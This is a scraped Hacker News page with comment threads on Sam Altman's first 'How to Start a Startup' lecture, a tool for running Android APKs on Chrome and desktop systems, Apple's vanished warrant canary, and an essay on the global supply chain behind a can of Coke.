-> When everyone thought Pinterest was a joke, Ben Silbermann walked around coffee shops in Palo Alto to convince people to use Pinterest. He set Pinterest to the home page in the Palo Alto public library so people would discover the website. Do things that don't scale. Read Paul Graham's essay.

-> Create a tight feedback loop. What do users like? What do they pay for? What would make them recommend it?

-> Try to keep your feedback loop going for all of your company's life

-> Do sales and customer support yourself in the early days. This is critical. Do not hire these people right away.

-> Keep track of metrics. Look at active users, activity levels, cohort retention, revenue, etc. Be brutally honest if they don't go in the right direction

-> If you don't get your product right, nothing else in this class will matter.

Why start a startup?

-> "It's glamorous", "You'll be the boss", "Flexibility", ...

-> Entrepreneurship gets romanticized

-> The reality is not so glamorous. It is a lot of hard work. You're sitting at your desk, focused, figuring out hard engineering projects. It is quite stressful.

-> Founder depression is a real thing. If you start a company, it's gonna be extremely hard

-> You have loads of responsibility

-> You're responsible for the opportunity cost of the people who decide to follow and help you out

-> You're more committed. A founder cannot leave a company. For 10 years if it's going well. Probably for 5 years if it's not going well.

-> "Number one role of a CEO is managing your own psychology"

-> You're always on call, you're a role model. You'll always be working anyway

-> If you joined Dropbox or Facebook early on, your financial reward might be a lot better than when starting a startup

-> If you join a later stage startup, you have more impact - massive userbase, existing infrastructure, work with an established team. E.g. Brett Taylor was employee #1500 at Google and he invented Google Maps. He got a big financial reward for this.

-> What's the best reason? You can't NOT do it. You have to make it happen

-> Do it out of passion

-> The world needs it (if not, go do something else) and/or the world needs you (you're well-suited to do it). The world needs you somewhere, find where.

2
tucaz 1 day ago 11 replies      
I've been watching it for 8 minutes as of now and despite the fact that the content looks good it really bores me to death that he is reading the whole thing like a robot. It does not sound like a natural conversation or presentation. Does anyone else share this feeling?
3
mbesto 1 day ago 3 replies      
Dustin talks about Financial Reward and Impact of "why to do a startup" for examples like Facebook and Dropbox here: https://www.youtube.com/watch?v=CBYhVcO4WgI#t=2161

Are these values correct? If you join Dropbox as employee #100 with 10bp, your 10bp is going to get massively diluted through subsequent rounds, no? Isn't it more like $1-2mil? And also this is wealth on paper, which means that you don't all of a sudden have $10mil sitting in the bank. I don't think he explains that but that's how it's portrayed, and is probably worth explaining, given the audience.

4
cjmb 1 day ago 2 replies      
On Sam's part -- am I the only one who got the "heard this before" feeling? Obviously he attributed everything pretty appropriately, but I thought I could've placed 50-75% of his sentences in the "Summary" sections of various PG essays, Peter Thiel writings, and other luminaries of the startup-sphere.

I'm not saying it was wrong or that his delivery was bad. But I remember reading the Class Notes from Thiel's class after Blake made them available and thinking "Wow, there's some original thoughts in here I haven't come across before."

Maybe it's because PG already put it all to paper, and some of these other figures just added post scripts. Maybe it was a solved problem by the time Sam got a seat at the table. Just some food for thought. Looking forward to the other lectures regardless.

5
kartikkumar 11 hours ago 1 reply      
One thing that bothered me about the lecture was reinforcement of the idea that working hard is the same as working long. I can appreciate the fact that at times as a founder you have to work all hours of the day, but surely this is not the optimum scenario for maximum productivity. If I look at my own work situation currently, it's abundantly apparent to me that the law of diminishing returns affects me strongly after working 8-10 hrs straight.

I would have expected the message to be that the most successful founders in the long-term are the ones that figure out the right work/life balance, to ensure they don't burn out. In other words, successful founders are able to be focussed and driven for the hours that they work, and in recharge-mode when offline.

This is intuitively what I would have expected and I'm curious if the message from the lecture of "work all day, everyday" is really right.

6
bcjordan 22 hours ago 0 replies      
To temper some of the nit picks, just wanted to say this lecture felt insightful and fun to watch. I hope YC continues this trend of investing effort in shareable advice content in the spirit of pg's essays.

This is the first time a lot of the YC flavor of startup how-to material has been presented in a lecture video format[1]. I suspect much of the long-term audience of these lectures wouldn't have come across pg's essays, Blake Masters' Peter Thiel startup notes or Dustin Moskovitz's excellent Medium posts before. Maybe some lecture watchers were allergic to long-form articles, or maybe some would rather receive a weekly email with videos. Myself, I consume this sort of material on my walk to work, either text-to-speeching essays or listening to lectures. The video lecture format was especially fun, I watched it full screen on the TV while eating an enchilada and poking my fiancee about points she might find relevant to her side project. How often do you get to consume this sort of content like that?

Having read pg's essays[2], I still had a number of "aha!" moments from Sam's slides and hearing his presentation. And hearing Dustin describe in his low-key tone why you should be employee 1,000 at an obviously successful startup rather than start your own, and backing it up with charts and photo-jokes about the elephant in the room was just entertaining. Seeing "this is how we'll teach you to do this thing. Here's an expert on why not to do this thing." is not always the type of juxtaposition you get with standalone online essays.

Looking forward to the next lecture. I'd say it's well worth the time and opportunity cost of putting this all together, so thanks all involved.

[1]: Yes, some Lean Startup and Principles of Entrepreneurship flavored material has been presented in lecture format before, but not YC lensed AFAIK.

[2]: Okay, I skipped the early seemingly pure-Lisp-focused ones. Though like Zen and the Art of Motorcycle Maintenance isn't about a long motorcycle trip, and maybe pg's Lisp essays are not really all about writing Lisp?

7
dheer01 18 hours ago 1 reply      
Disagree completely with the very first opinion expressed - 'Don't do a startup just to do one - do it only if you really want to solve a problem'.

India has produced about 3 big ~billion dollar companies in the recent past - inmobi, flipkart, druvaa. None of the founders really started to 'solve' a problem they were passionate about. What they were really passionate about was just 'starting up' - and based on their personal strengths, industry knowledge and what they thought could be sold, stumbled on these big businesses. This was probably true for HP too.

It is absolutely ok to do a startup just for the heck of it. Get in the game and find out the intersection of what you can build and what a customer will buy. If you build a big business - the passion will follow. Do not forget to bullshit though on your big interview on how the so solved problem kept you awake at nights - it makes for some good reading and impressionable pr.

8
agentultra 11 hours ago 0 replies      
Great presentation and very clear that the rest of the course will be focusing on advice for SV-style hyper-growth startups.

There's still some good advice for those of us not interested in that life style. I was particularly taken with the idea of building something that just a handful of people will really love. Having a rapt-audience for your product would be a huge win if you decide to build more, scale up, or sell out.

I think it's really good that they're at least trying to convey how difficult building the style of companies they're talking about can be. I can appreciate how challenging that must be. The cultural yard-stick for success these days are valuations and IPOs. There's a ton of pressure to go that route especially from YC. I'm glad they're being conscientious about it even if they don't 100% succeed at removing some of the glimmer from the stars in peoples' eyes.

There's nothing wrong with wanting to start a smaller enterprise and aspire to keep just a handful of customers you know by name.

9
smuss77 1 day ago 10 replies      
@3:12: "There are much easier ways of getting rich." Could I get some examples? Thank you!
10
Reltair 1 day ago 0 replies      
The recommended reading from the final slide:

- The Hard Thing About Hard Things

- Zero to One (CS 138A)

- The Facebook Effect

- The 15 Commitments of Conscious Leadership

- The Tao of Leadership

- Nonviolent Communication

11
bayesianhorse 23 hours ago 1 reply      
There are easier ways to get rich? For Stanford Graduates, maybe. For those who don't have a degree in an ultra-paying job, I'd really like to know an easier way.

I'm usually sceptical about start-up chances, I know how much work it means, and I know that a lot of early-stage employees get rich, too. Yet, I don't think you can get rich this fast/easy with a modest degree... Even as early-stage employee often you'll still get a raw deal or you overestimate their chances of success.

12
jduhamel 1 day ago 0 replies      
The presentation style is a bit rough but the material is gold.
13
ckvamme 6 hours ago 0 replies      
I posted some casual, but in depth notes on my site for anyone wanting to skip the video:

http://chriskvamme.com/

14
jtwebman 21 hours ago 0 replies      
Wow this was good information. It really got me thinking on what my reasons are and how bad they might be. Did anyone else get that from this?

I would also love if they cover how you work on a startup if you still have the 40 hours a week programming job as well. And how to avoid getting in trouble or legal issues with your job.

15
piotry 13 hours ago 0 replies      
Funny that I just wrote about how I was considering killing a startup I started: https://medium.com/@piotr/i-failed-82b9469977ac?source=lates...

Probably the best way to know how to build a successful one is knowing how to build one that won't fail!

16
bramgg 1 day ago 2 replies      
@2:22: "You may still fail. The outcome is something like Idea x Product x Execution x Team x Luck, where Luck is a random number between 0 and 10,000, literally that much."

What does that mean? I'm not trying to rip on the video or anything like that, but am genuinely curious as to how much luck Sam Altman thinks is involved in a startup.

17
coralreef 21 hours ago 1 reply      
Sam mentioned that the idea was actually quite important. I recall PG saying that YC would often invest in the team because ideas change and aren't as important as good founders.

Anyone have thoughts on this?

18
rdlecler1 1 day ago 2 replies      
Sam: "Step 1, build something that users love"

How does this compare with an MVP approach where you put something out there first and test the market. Then there is the issue of runway. With enough time, you can start with an MVP and iterate in private beta until users love it, but in many cases a founder is not going to have that kind of runway. They have just enough resources to put something together, and they're going to have to go out to the market with that and iterate on the fly. Unfortunately, once you do get out there and need to take on all of the other responsibilities, then that's time taken away from building a great product.

19
lukasm 1 day ago 2 replies      
I find it artificial when the lecturer reads the presentation - it's not a joy to listen.
20
howradical 13 hours ago 0 replies      
Here are some timestamped notes synced with the video: https://timelined.com/how-to-start-a-startup/lecture-1-how-t...
21
dkaplan 1 day ago 0 replies      
Why did we submit questions if the video was just going to cut out at the Q&A
22
petersouth 1 day ago 1 reply      
Sam Altman's law of conservation of how much happiness you can put into the world with the first product from a startup -> the total amount of love is the same it's just a question of how it's distributed.
23
steakejjs 1 day ago 0 replies      
This seems like a really valuable recruiting tool for YC. Start early at Stanford, groom freshmen to have a great mindset and understanding of the fundamentals, fund them and make money.

YC is still a for-profit company, after all.

24
lawsohard 14 hours ago 0 replies      
looks like rap genius is putting up a full transcript http://tech.genius.com/Sam-altman-how-to-start-a-startup-lec...
25
steve_taylor 16 hours ago 0 replies      
It's refreshing to see such importance placed on the idea and building a product that users love.
26
hayksaakian 1 day ago 2 replies      
Sam kept bringing up the 10 year number

But: YC (and therefore every YC company) is < 8 years old

What startups succeeded after this long (AND were still actually considered startups)

27
simonebrunozzi 1 day ago 0 replies      
I also don't agree that working on a startup should mean no work-life balance. There's a limit to how productive you can be, and working 90 hours/week is not going to make you more productive than working 45 hours/week. If you work too much, you'll do more mistakes. Ryan Carson, founder of TeamTreeHouse, can teach us a lot about it. http://ryancarson.com/
28
dkural 1 day ago 1 reply      
I disagree that a startup should commonly start with an "idea". Start with an unmet need people are willing to pay for. Or take an existing category with a lot of bad products and make a truly better one that improves every aspect of the experience. Often, you'll see many startups working on the same "idea". Something like Google is truly rare (a genuinely innovative approach to search).
29
bobbles 1 day ago 0 replies      
Are transcriptions of these videos going to be provided?

It's much easier for me to consume lectures as text rather than watching the video.

30
ThomPete 1 day ago 6 replies      
Don't get me wrong I love Sam Altman I love y-combinator but a small part of me is thinking that a good first step to start a startup is to not watch that video and find your own way. Not because it's probably not great but because a startup is not a formula.

Your path is your own.

31
gadders 15 hours ago 0 replies      
Just a quick question - are these a Sam only initiative, rather than YC? Is that why they are on Sam's domain?
32
AzmD 18 hours ago 0 replies      
Ideas are important ... but if Ycombinator stresses so much on the idea being really great then they should take these lines off their website (it's on the "Apply" page)

"Your idea is important too, but mainly as evidence that you can have good ideas. Most successful startups change their idea substantially."

33
smaili 1 day ago 0 replies      
Can non-Stanford students drop in or is this for students only?
34
gorkemyurt 1 day ago 1 reply      
It's really sad that he is reading the presentation..
35
xavierkelly 21 hours ago 0 replies      
This is a really good video lesson. I feel inspired to work harder on my dreams of growing my startup.
36
7Figures2Commas 1 day ago 0 replies      
"All the advice in this class is geared towards people starting a business where the goal is hyper-growth and eventually building a very large company. Much of it doesn't apply in other cases and I want to warn people up front that if you try to do these things in a lot of big companies or non-startups it won't work."
37
polskibus 22 hours ago 1 reply      
Is there a download link for the video to make offline viewing possible?
38
graycat 1 day ago 2 replies      
Just watched the lecture.

The first part of the lecture was on the "Idea", and I want to give an alternative approach.

First, do I believe that what Altman describes can work and is what he has seen has worked? Definitely yes.

Second, is that all that can work? I don't think so.

Third, do I suggest that the alternative approach I describe here will be common and/or always better than what Altman describes? No. Sometimes better? I do believe so. But even if the alternative approach is rare, that should not be a huge obstacle since the success Altman is talking about, the goal, is also rare. That is, for the rare successes, we should expect that some of the means will also be rare and not common.

But for the alternative approach, given that it is rare, we should have some solid evidence of its effectiveness, and I believe that we can.

I want to propose that it can be possible to have an idea, test it, essentially just on paper, and, if it passes the test, be quite sure the resulting product will be good and fairly sure the resulting company will be successful.

Yes, I'm proposing that the alternative approach provides a way to have the idea be by far the most important part of the work and the rest, e.g., the execution, be routine.

Or I would say that a good idea is one that makes it through the filters of my alternative approach. Then I am claiming that with a bad idea, yes, execution is everything but with a good idea execution is routine.

Yes, to me, the ideas like Altman describes look to me as far too unpromising to be taken seriously and promise that, yes, indeed, execution will be many times more difficult than the idea. Indeed, Altman is admitting that many start ups fail, that building a successful start up is difficult. I would agree that, starting with a bad idea, building a successful start up is difficult.

Now, for the alternative approach for finding a good idea for a start up:

First, the alternative approach is very selective, that is, rejects a lot of ideas. Some of the ideas the approach rejects will be able to be the basis of successful companies. The alternative approach rejects ideas when it just cannot build a rock solid case that the idea is good. E.g., the alternative does not know how to conclude that the ideas for Facebook or Twitter would lead to success. The alternative wants to accept only good ideas and in doing so will reject a lot of good ideas. The alternative approach asks for a lot from an idea, and many good ideas will not have that much.

Second, Altman does emphasize that a need and a corresponding solution one person sees in their own life can be relevant. Okay, I've been there and done that, that is, I've seen needs and solutions.

Third, what I'm proposing for an alternative is, at least in broad terms, and compared with what Altman describes, much older, much more thoroughly tested, and with a much better, really excellent, track record.

Actually, we all know at least something, maybe a lot, about the alternative and its track record. I learned about the alternative early in my career doing mostly US DoD projects around DC and also some other experiences, but there is much more information about the alternative readily available far from me.

So:

(1) Need.

To make the alternative work, we have to start with a suitable need, i.e., market need, that is, a suitable problem to solve. We want the first good or a much better solution to be, obviously, no doubt, a "must have" and not just a "nice to have".

Next, for this need, we want to find the first good or a much better solution, presented just on paper.

Then we want to evaluate the solution, also just on paper. Sorry, no, we don't "get out of the building" and talk to other people.

Big example of such a need? Okay, we'd like to have a safe, effective, inexpensive one pill taken once to cure any cancer. So, yes, early on, for Facebook, Twitter, Snapchat, a lot of doubt. For such a cancer pill, we have "no doubt"; to know this we don't have to "get out of the building", ask people, throw trial solutions against a wall to see if there is interest, etc.

(2) Solution.

Given the need from (1), we try to find a solution. If we fail here, and likely we will, we return to (1) and find another need. E.g., clearly so far the one pill cure for any cancer will fail here for at least a long time.

We want a solution that we are sure, "no doubt", will be the first good or much better.

Here's a way: Start with the real problem and see what about it we can assume. Then convert this problem and its assumptions into a mathematical problem. So, we are limiting ourselves to needs that lead faithfully to mathematical problems. Sorry, no intuitive heuristics need apply.

Next find a mathematical solution.

Develop the mathematical solution just on paper, as carefully done theorems and proofs, and then severely check the proofs.

Then observe that it is totally clear that the mathematical solution will be fully close enough to the first good or much better solution we want for the need.

If any of the work here in step (2) fails, then return to step (1).

(3) Product.

Write software to do the data manipulations specified by the mathematical solution. Severely check the software. That's essentially the product.

If fail here, then return to (1).

Track record? Okay:

(A) GPS.

(B) The version of GPS done first by the US Navy for the SSBNs.

(C) Beam forming in passive sonar.

(D) The A-bomb of WWII -- all three exploded just as planned.

(E) The H-bomb of the 1950s -- first test, 15 million tons of TNT.

(F) The SR-71, for Mach 3+, 80,000+ feet, 2000+ miles without refueling; proposed by Kelly Johnson just on paper; built and flown just as proposed.

(G) Keyhole satellite, essentially a Hubble, before Hubble, but aimed at earth instead of space.

(H) The F-117 stealth, essentially a modified F-16, flew as planned, through Saddam's anti-aircraft artillery without a scratch.

(I) The airplane the Wright brothers took to Kitty Hawk, NC.

(J) Phased array radar for Aegis class ships.

(K) High bypass turbofan engines.

(L) RSA encryption.

(M) Hubble.

(N) LHC.

(O) COBE, WMAP, and Planck.

And there are many more. Such projects that failed in execution? Tough to find. Batting average? Near 1000.

Right: Projects A-O are all just technical projects. Right. But in each case they provided the intended solution for the need. As we have explained, to have a successful technical solution lead to a successful solution in business, we want such a solution to be a "must have"; else we return to (1).

The high bypass turbofan jet engine a commercial "must have"? Darned right: It saves an ocean of expensive jet fuel. How? Simple: Burning jet fuel releases energy. Want to convert that energy to kinetic energy and get the resulting momentum. But for mass m and velocity v, kinetic energy is (1/2) mv^2 and momentum is just mv. So, we pay in energy (1/2) mv^2 and get in the momentum we want mv.

So, since in kinetic energy we have v^2 but in momentum have just v, to get more of our desired momentum from our given, available energy, we want m to be large and v to be small. So, mostly we want to use the hot gasses from the combustion to turn a big ducted propeller that moves a huge mass of air at a low velocity. Instead, the military jet engines intended for supersonic speeds, and long used in commercial aviation because they were available, move a smaller mass at high velocity. So, for commercial, subsonic flight, a high bypass turbofan is a "must have". Then have the first good one or a much better one, as we have assumed, and very much should have a successful business.

39
reelgirl 1 day ago 0 replies      
I loved the video and it really encouraged me to keep on trying.
40
simonebrunozzi 1 day ago 0 replies      
Sam, your voice sounds very irritating to me. Sometimes too fast, no "tempo". I think you should change the way you deliver your points to a classroom. (constructive feedback, not rant)
41
hanley 1 day ago 0 replies      
Very interesting lectures and it's great that they are doing this. Both of the speakers could benefit from a public speaking class though.
42
gbachik 1 day ago 0 replies      
It was so good I wish it was Thursday.

I want mooooore!

43
pmosh 1 day ago 0 replies      
subtitles please!!
44
porter 1 day ago 1 reply      
Ycombinator leading the way once again. Looking forward to this!
7
Chromeos-apk Run Android APKs on Chrome OS, OS X, Linux and Windows
466 points by ProfDreamer  5 days ago   92 comments top 19
1
cryptoz 5 days ago 3 replies      
This is amazing. There's a long reddit thread and some additional instructions here: http://www.reddit.com/r/Android/comments/2gv035/you_can_now_...

From the README:

> Soundcloud - Works, crashes when playing sound

Funny definition of 'works'.

2
byuu 5 days ago 5 replies      
Can anyone explain how this differs from using an Android emulator? (http://developer.android.com/tools/help/emulator.html)

Is it a matter of features, speed, or convenience? Obviously, all of those can be overcome, be it as a fork of the official emulator or as a third-party emulator. For instance, this new Chrome extension must be the same thing under the hood: a Dalvik runtime, possibly an ARM->Intel recompiler for any NDK applications, etc.

I figured the only reason this wasn't done to mass effect already was because it wasn't in demand. But if it's so desirable, surely creating an actual emulator would be superior to hacking up web browser extensions and ostensibly playing cat-and-mouse with Google over this?

3
AdmiralAsshat 5 days ago 3 replies      
Neat proof of concept.

I hope Google gets us something official sooner rather than later. It's a little disheartening that I own a Chromebook Pixel and yet I can't use Google's own hardware to design or test Android apps without installing Eclipse on a sideloaded Linux chroot via Crouton.

4
kasabali 5 days ago 2 replies      
I will absolutely go nuts if this thing manages to run OneNote on my Debian desktop.
5
wzsddtc 3 days ago 0 replies      
We worked with the ARC team at Vine as a launch partner, there were 0 modifications that we had to do to get it working on ARC. The only difference was that the "bugs" we had to fix were all reproducible on Nexus devices as well BUT the threading model had to be more strict on ARC in terms of accessing system resources.
6
oldgun 5 days ago 0 replies      
This is amazing.

I hope Google could really carry this project as far as possible. The next several major issues would be polishing up the platform, eliminating the bugs, unifying the android and chromebook development interface. Think of one day when android developers could actually design apps for the desktop. How cool would that be?

That's when Microsoft should really get worried.

7
niutech 4 days ago 1 reply      
Running Android apps in Chrome on desktop is huge! I'm glad that the ARC runtime I provided in https://github.com/vladikoff/chromeos-apk/issues/5 helped to achieve this.
8
Flenser 13 hours ago 0 replies      
Could you use this to run ChromiumTestShell.apk on Windows for testing Android Chrome rendering?

[1] http://commondatastorage.googleapis.com/chromium-browser-con...

9
bla2 5 days ago 0 replies      
Interesting, Google announced working on this on this year's I/O and posted the first apps just one week ago ( http://chrome.blogspot.com/2014/09/first-set-of-android-apps... ).
10
tracker1 5 days ago 1 reply      
Hope this means good Netflix support in Linux.
11
bmelton 5 days ago 1 reply      
So, now we can write apps in Angular that run on the web and compile to Java so that we can install them to Android, running on ChromeOS, running on OSX.

Brilliant.

Edit: Perhaps the punny nature of this is deserving of downvotes, but the statement above is the actual use case I presented to a co-developer, discussing how this project could be of use to our app, which was built with Ionic.

FWIW, there's value in it (the app, not necessarily this post) even if it means having to unplug fewer devices to swap them out with different devices to test.

12
asadotzler 5 days ago 0 replies      
Java makes a triumphant comeback in the browser?
13
kyrrewk 4 days ago 0 replies      
I have had some success running Android x86 (http://www.android-x86.org/) in VirtualBox.
14
bussiere 5 days ago 0 replies      
Fuuuuu, Out There, a good game only available on mobile, crashes with this solution ...

Damn, but it looks full of promise. I hope one day it will work well ...

15
mattfrommars 4 days ago 1 reply      
How is this really good? Android apps are really good but they are designed for touch interface on mobile devices, not desktop.
16
em3rgent0rdr 5 days ago 0 replies      
Awesome! Works for me on Arch Linux running latest Chromium. Much faster than running the Android emulator!
17
chj 5 days ago 0 replies      
Google needs to do this.
18
mjcohen 3 days ago 0 replies      
Want Open Office!
19
stuaxo 5 days ago 0 replies      
It's about bloody time!
8
Apple's warrant canary disappears
405 points by panarky  6 days ago   93 comments top 15
1
kwhite 6 days ago 4 replies      
Is there any reason why a company could not apply the same concept of a warrant canary on a user-by-user basis?

Imagine seeing a message every time you log into your Gmail account informing you that Google has never been compelled to surrender your private data to a law enforcement agency.

2
panarky 6 days ago 1 reply      
Possible explanations:

1) It wasn't a canary to begin with, so its removal means nothing.

2) There's no legal precedent for disclosing a Section 215 order by killing the canary, so Apple removed it before they received a Section 215 order. That way it doesn't disclose anything and Apple avoids legal liability.

3) Apple really did receive a Section 215 order.

3
rrggrr 6 days ago 0 replies      
As explained by Apple:

In the first six months of 2014, we received 250 or fewer of these requests. Though we would like to be more specific, by law this is the most precise information we are currently allowed to disclose.

http://www.apple.com/privacy/government-information-requests...

4
nl 6 days ago 1 reply      
Interesting and somewhat disappointing that it took a year for anyone to notice that it had disappeared. The appearance generated quite a lot of interest.

(Of course, I'm as responsible as anyone else for not noticing. I wonder if it would be possible to build a service to proactively check for their disappearance?)

5
UVB-76 6 days ago 2 replies      
Gee, thanks for the hat tip...

https://news.ycombinator.com/item?id=8334058

6
johnhess 6 days ago 4 replies      
Could a lawyer or someone with familiarity with warrants like these explain how a "warrant canary" is legal?

I understand the concept, but it discloses something you can't disclose. They can compel you to lie/not comment if asked, "Hey, Apple, did you get any of those National Security Letters".

Is there a clear cut loophole or is this something yet to be challenged?

7
tkinom 6 days ago 1 reply      
I wonder what happens if Russia, China, India, Japan, and the EU all demand the same level of access to Apple's data.

Apple might not care about Iran or other smaller countries, but how is it going to deal with big markets like China, India, EU?

8
chiph 6 days ago 0 replies      
Under what conditions would the warrant canary statement reappear? I'm thinking of those workplace safety signs: "This corporation has operated for [ 179 ] days without a Section 215 warrant being served"
9
crazypyro 6 days ago 0 replies      
Have any of the other major tech companies had similar canary disappearances? I only ask because this is the first time I've heard of one actually being used by a tech company as a warning flare.

I'd expect a governmental legal challenge...

10
MrJagil 6 days ago 11 replies      
I've asked this before to no avail, but what can the NSA possibly do if Apple refuses?

Fine them? Sure, they have billions.

They can't arrest the company... Is Cook going to jail? What is the actual threat here? You could argue that Apple has more power than many governments.

11
staunch 6 days ago 1 reply      
Apple should just declare that they have been subject to Section 215. Given how many users Apple has it can't reasonably be argued that such a disclosure would be a danger to national security.

Hopefully they would end up before SCOTUS and help defang the USA PATRIOT Act.

12
stevewepay 6 days ago 0 replies      
So now what? Now that the canary has disappeared, is there no other information that can be transmitted to us? It feels like it's a binary signal that just got set permanently, so there's no more information we can glean from it.
13
ForHackernews 6 days ago 1 reply      
Very interesting in light of this: https://news.ycombinator.com/item?id=8333258
14
maresca 6 days ago 0 replies      
Perhaps this is the reason for all of the security updates in iOS 8.
9
What Coke Contains (2013)
406 points by fmela  5 days ago   176 comments top 33
1
d0mdo0ss 5 days ago 4 replies      
> coca-leaf which comes from South America and is processed in a unique US government authorized factory in New Jersey to remove its addictive stimulant cocaine

According to Wikipedia "The Stepan Company is the only manufacturing plant authorized by the Federal Government to import and process the coca plant, which it obtains mainly from Peru and, to a lesser extent, Bolivia. Besides producing the coca flavoring agent for Coca-Cola, the Stepan Company extracts cocaine from the coca leaves, which it sells to Mallinckrodt, a St. Louis, Missouri, pharmaceutical manufacturer that is the only company in the United States licensed to purify cocaine for medicinal use."

2
Someone1234 5 days ago 11 replies      
I wish Coca Cola would make an acid-free version of Coke. The Phosphoric Acid adds a slight tang to the drink, but in exchange absolutely destroys your teeth over years of consumption.

For regular drinkers like myself I'd happily pay a small premium to buy the "acid free" version of the drink. The sugar still does damage but with both the acid AND sugar it is like a double whammy of "badness" (acid which destroys your teeth's natural protective coating, and sugar to feed the bacteria which actually eat away at your teeth).

No amount of brushing can really undo the amount of damage acidic soda does to your teeth, trust me I know! Even with prescription toothpaste with fluoride 5x times stronger than normal (5000 ppm toothpaste Vs. 1100 ppm) you're only slowing down the progression.

3
jstalin 5 days ago 4 replies      
The same type of story as the classic "I, pencil," published in 1958:

https://en.wikipedia.org/wiki/I%2C_Pencil

4
srean 5 days ago 1 reply      
The article waxes so eloquently about this beloved product that I would have mistaken it for a paid PR piece. The article is a great read nonetheless.

Those who are also interested in the other darker, grimier side of the same coin might want to check out its use of mercenaries for union busting in South America (by murder of course. In the hands of the right spinners that would be 'terrorism'), similar stuff happened in India as well.

http://en.wikipedia.org/wiki/Criticism_of_Coca-Cola#Bottling...

http://en.wikipedia.org/wiki/Criticism_of_Coca-Cola#Environm...

5
klinquist 5 days ago 3 replies      
You can make your own almost-Coke... OpenCola, the open-source cola.

https://en.wikipedia.org/wiki/OpenCola_(drink)

6
gokhan 5 days ago 9 replies      
> The number of individuals who know how to make a can of Coke is zero.

This reminds me of a fact I remember from time to time. If civilization collapses after, say, a world war, I most probably can't make a pot, can't grow plants, can't differentiate if one is edible or not, can't dig for petrol, can't make plastic (or even glass), can't reinvent concrete, can't make gunpowder etc., you get the point.

I can only write software and maybe drill with tools and nail with a hammer but that's all.

7
bjornsing 5 days ago 3 replies      
> The top of the can is then added. This is carefully engineered: it is made from aluminum, but it has to be thicker and stronger to withstand the pressure of the carbon dioxide gas, and so it uses an alloy with more magnesium than the rest of the can.

Nope, the pressure from the carbon dioxide pushes equally against all sides of the can. If anything the pressure at the top is slightly lower than at the bottom, at least if the can is standing, because of the weight of the coke pushing against the bottom.

8
vesche 4 days ago 0 replies      
> ... the inside of the can is painted too - with a complex chemical called a comestible polymeric coating that prevents any of the aluminum getting into the soda.

I thought this was very interesting, so I did a little digging... There is remarkably little information on these 'comestible polymeric coatings', but I was able to find (see below) a reason as to why that is. Apparently these coatings are proprietary to the manufacturer and there are competing companies who are constantly in a race to find the best coating.

It's supremely interesting the fact that drinking a can of coke is almost a magic trick right in front of your eyes. It'd be like someone holding a lighter straight to a piece of paper and everyone being baffled as to why it isn't lighting on fire. Yet when someone drinks a coke no one bats an eye as to how it isn't mixing with the metal salts and eating straight through the aluminum can.

"Interior can coatings designed to prevent migration of metal salts into the contained product are called "comestible polymeric coatings". The coatings are polymers typically used in coil coating. The exact nature of the coatings isn't available since most are proprietary to manufacturers who continuously look for better coatings."

source: http://www.eng-tips.com/viewthread.cfm?qid=258261

9
JacobAldridge 5 days ago 1 reply      
Actually, the Pinjarra process creates Aluminium. The process of shipping it to Long Beach CA converts it into aluminum.
10
neya 5 days ago 2 replies      
I'm surprised that the author hasn't mentioned the use of toxins (pesticides)[1], to the extent that it is even being used as a real pesticide in various parts of India.

I know some may find this offensive, but sorry, I think I have a moral responsibility myself to let the people around me know of the harms caused by this carcinogen[1].

Cheers.

[1]http://en.wikipedia.org/wiki/Criticism_of_Coca-Cola#Pesticid...

12
makmanalp 5 days ago 0 replies      
My favourite version of this is a picture of a Boeing 787 and where all the parts are manufactured: http://seattletimes.com/art/news/business/boeing/787/partsen...

Of course if you could break it down further into smaller parts and tools to manufacture those parts, you'd get an even greater variety of countries and companies.

The center where I work actually does work slightly related to this, https://www.youtube.com/watch?v=0JC24CBVsdo

13
Theodores 5 days ago 1 reply      
You could say this about any product. I think the essay would be considerably longer if it concerned a typical PC or phone, not to mention a car.

I also think the essay can be written with cynicism instead of wonder, e.g. with an anti-capitalist slant. With one innocuous affordable purchase you can deforest and pollute four continents whilst giving yourself diabetes and dental caries!!!

14
gburt 5 days ago 0 replies      
I am reminded of I, Pencil. [1]

[1] http://www.econlib.org/library/Essays/rdPncl1.html

15
jeffbarr 5 days ago 2 replies      
This is my favorite sentence of the article:

> Modern tool chains are so long and complex that they bind us into one people and one planet.

When we think about colonizing the Moon or Mars with small groups of people with the intention of making the colonies self-sustaining over time, deep, long-evolved tool chains like the one described in the article could be very difficult to scale down and to replicate in other environments.

16
raverbashing 5 days ago 1 reply      
"The top of the can is then added. This is carefully engineered: it is made from aluminum, but it has to be thicker and stronger to withstand the pressure of the carbon dioxide gas, and so it uses an alloy with more magnesium than the rest of the can"

Yes, but the pressure is the same on all parts of the can. Ok, almost the same, still.

Maybe because of the parts that have been cut to make it easy to open?

17
Tloewald 3 days ago 0 replies      
This article reminds me strongly of a pivotal passage in the novel Gain, by Richard Powers (which I can't recommend highly enough, although it's a downer). In that passage he describes how a disposable film camera is made.
18
AlyssaRowan 4 days ago 0 replies      
Not that I want to waste any time on a HPLC-MS machine on this, but I was distinctly under the impression Coca-Cola 7X does not actually contain kola nut?

I've had Red Bull Cola, and actually found it quite different, but delicious. No accounting for taste, though.

19
NotOscarWilde 5 days ago 2 replies      
Speaking as somebody who's never even smoked a cigarette or a joint: are there people who tried to recreate the "original" coke recipe? The one with "unprocessed" coca leaves? Is it available on say the latest instance of Silk Road? What is it like?
20
lpolovets 5 days ago 0 replies      
There's a book with a similar theme about Twinkies. It's called "Twinkie, Deconstructed" (http://www.amazon.com/gp/product/B000OZ0NZS)
21
exacube 4 days ago 2 replies      
How can 0 people know what's in Coke while still getting it FDA approved? Surely this can't be true.. How does the company know how to make a can of coke if they don't know how it's put together?
22
TazeTSchnitzel 5 days ago 1 reply      
> The number of individual nations that could produce a can of Coke is zero.

While this is true in that no individual nation could produce Coke with the exact same formula, an individual nation could surely produce a soft drink.

23
Istof 5 days ago 1 reply      
"[...] and the edges of the can are folded over it and welded shut."

I never thought there was any weld in a soda can... (and I still don't think there is any)

24
cbhl 5 days ago 1 reply      
Article title should probably contain (2013).
25
justintocci 5 days ago 1 reply      
I wonder what the failure rate on the interior coating is? How often are people ingesting dissolved aluminum?
26
swartkrans 5 days ago 1 reply      
Is the ammonia dangerous? Or can it be? How much ammonia can a person consume before it becomes dangerous?
27
alecco 5 days ago 1 reply      
To keep you drinking they add plenty of sodium (50mg+) masked with sugar, HFCS, or sweeteners. They also add caffeine as a diuretic to keep consumers drinking, too. And then they market it to children, lovely people.

Check out Dr. Robert Lustig videos. Also, the book Salt, Sugar, Fat, about food industry engineering.

28
yarou 5 days ago 0 replies      
